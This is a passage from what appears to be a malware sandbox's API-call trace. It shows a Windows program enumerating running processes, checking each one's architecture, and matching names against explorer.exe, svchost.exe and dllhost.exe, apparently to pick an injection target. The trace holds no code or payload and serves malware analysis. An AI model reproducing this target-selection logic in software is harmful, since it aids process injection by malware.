szExeFile="spoolsv.exe")) returned 1 [0189.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0189.877] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0189.877] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.877] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.877] CloseHandle (hObject=0xec) returned 1 [0189.877] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0189.878] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0189.878] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0189.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0189.879] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.879] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.879] CloseHandle (hObject=0xec) returned 1 [0189.879] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0189.879] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0189.879] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0189.879] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0189.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0189.879] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.879] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.879] CloseHandle (hObject=0xec) returned 1 [0189.879] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0189.879] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0189.879] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0189.880] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0189.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0189.880] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.880] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.880] CloseHandle (hObject=0xec) returned 1 [0189.880] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0189.880] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0189.880] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0189.880] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0189.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0189.881] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.881] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.881] CloseHandle (hObject=0xec) returned 1 [0189.881] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0189.881] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0189.881] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0189.881] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0189.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0189.881] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.881] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.881] CloseHandle (hObject=0xec) returned 1 [0189.882] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0189.882] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0189.882] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0189.882] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0189.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0189.882] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.882] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.882] CloseHandle (hObject=0xec) returned 1 [0189.882] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0189.882] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0189.882] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0189.882] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0189.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0189.883] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.883] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.883] CloseHandle (hObject=0xec) returned 1 [0189.883] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0189.883] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0189.883] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0189.883] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0189.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0189.883] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.883] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.884] CloseHandle (hObject=0xec) returned 1 [0189.884] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0189.884] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0189.884] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0189.884] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0189.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0189.884] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.884] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.884] CloseHandle (hObject=0xec) returned 1 [0189.884] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0189.884] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0189.884] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0189.884] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0189.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0189.885] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.885] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.885] CloseHandle (hObject=0xec) returned 1 [0189.885] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0189.885] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0189.885] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0189.885] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0189.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0189.886] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.886] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.886] CloseHandle (hObject=0xec) returned 1 [0189.886] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0189.886] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0189.886] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0189.886] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0189.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0189.886] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.886] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.886] CloseHandle (hObject=0xec) returned 1 [0189.886] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0189.886] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0189.886] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0189.886] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0189.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0189.887] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.887] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.887] CloseHandle (hObject=0xec) returned 1 [0189.887] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0189.887] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0189.887] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0189.887] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0189.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0189.888] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.888] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.888] CloseHandle (hObject=0xec) returned 1 [0189.888] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0189.888] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0189.888] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0189.888] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0189.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0189.888] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.888] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.888] CloseHandle (hObject=0xec) returned 1 [0189.888] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0189.888] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0189.888] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0189.888] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0189.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0189.889] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.889] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.889] CloseHandle (hObject=0xec) returned 1 [0189.889] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0189.889] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0189.889] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0189.889] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0189.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0189.890] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.890] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.890] CloseHandle (hObject=0xec) returned 1 [0189.890] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0189.890] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0189.890] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0189.890] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0189.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0189.890] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.890] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.890] CloseHandle (hObject=0xec) returned 1 [0189.890] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0189.890] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0189.890] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0189.890] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0189.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0189.891] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.891] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.891] CloseHandle (hObject=0xec) returned 1 [0189.891] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0189.891] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0189.891] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0189.891] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0189.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0189.892] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.892] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.892] CloseHandle (hObject=0xec) returned 1 [0189.892] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0189.892] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0189.892] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0189.892] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0189.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0189.892] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.893] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.893] CloseHandle (hObject=0xec) returned 1 [0189.893] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0189.893] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0189.893] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0189.893] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0189.893] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0189.894] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0189.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0189.894] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0189.895] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0189.895] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0189.896] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0189.896] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.896] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.896] CloseHandle (hObject=0xec) returned 1 [0189.896] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0189.897] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.897] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.897] CloseHandle (hObject=0xec) returned 1 [0189.897] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0189.897] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0189.898] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.898] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.898] CloseHandle (hObject=0xec) returned 1 [0189.898] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0189.898] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.899] OpenProcess 